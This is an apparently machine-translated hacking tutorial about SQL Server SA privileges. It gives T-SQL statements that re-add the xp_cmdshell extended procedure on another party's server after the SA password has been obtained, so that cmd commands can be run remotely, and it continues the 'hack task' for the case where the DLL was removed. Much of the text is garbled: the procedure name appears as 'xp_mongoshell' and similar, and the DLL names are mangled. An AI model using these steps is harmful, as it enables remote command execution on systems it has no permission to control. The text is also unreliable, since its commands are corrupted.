SQL Server SA permission summary classic Technology

Required Tools: SQL Query Analyzer and SqlExec Sunx Version

Part 1:

Summary on how to remove xp_cmdshell to protect the system:
First, let's know the statement:
1. To remove the xp_cmdshell extension process, use the following statement:
If exists (select * from dbo. sysobjects where id = object_id (n' [dbo]. [xpcmdshell] ') and OBJECTPROPERTY (id, n' isextendedproc') = 1) exec sp_dropextendedproc n' [dbo]. [xp_cmdshell]'
2. To add the xp_cmdshell extension process, use the following statement:
Sp_addextendedproc xp_cmdshell, @ dllname = 'loglog70. dll'
Now let's look at the phenomenon:
After obtaining the SA permission, we remotely use Sqlexec to execute the cmd command, and the prompt SQL _ERROR is displayed. Therefore, xp_mongoshell may be removed.

Now let's take a look at the two methods to restore after xp_cmdshell is removed:

Method 1: use SQL Query Analyzer to connect to the other party and write data directly. It is quite convenient to sp_addextendedproc xp_mongoshell, @ dllname = 'loglog70. dll 'method 2: use SqlExec Sunx Version first fill in % s in the Format option of SqlExec Sunx Version, enter sp_addextendedproc 'XP _ javasshell' in the CMD option, 'xpsql70. dll 'or use sp_addextendedproc 'XP _ shortshell' and 'XP log70. dll 'in addition, use SqlExec Sunx Version to remove the xp_mongoshell method and select the same conditions when adding the method. Then enter sp_dropextendedproc 'XP _ mongoshell'.

Part 2:

If the other party has deleted or renamed xplog70.dll, we will use the following method to continue our hack task:

The following suggestion indicates that the xplog70.dll is deleted or renamed.

Write sp_addextendedproc xp_mongoshell in the query analyzer, @ dllname = 'loglog70. dll ', and the system prompts that an object named 'XP _ mongoshell' already exists in the database.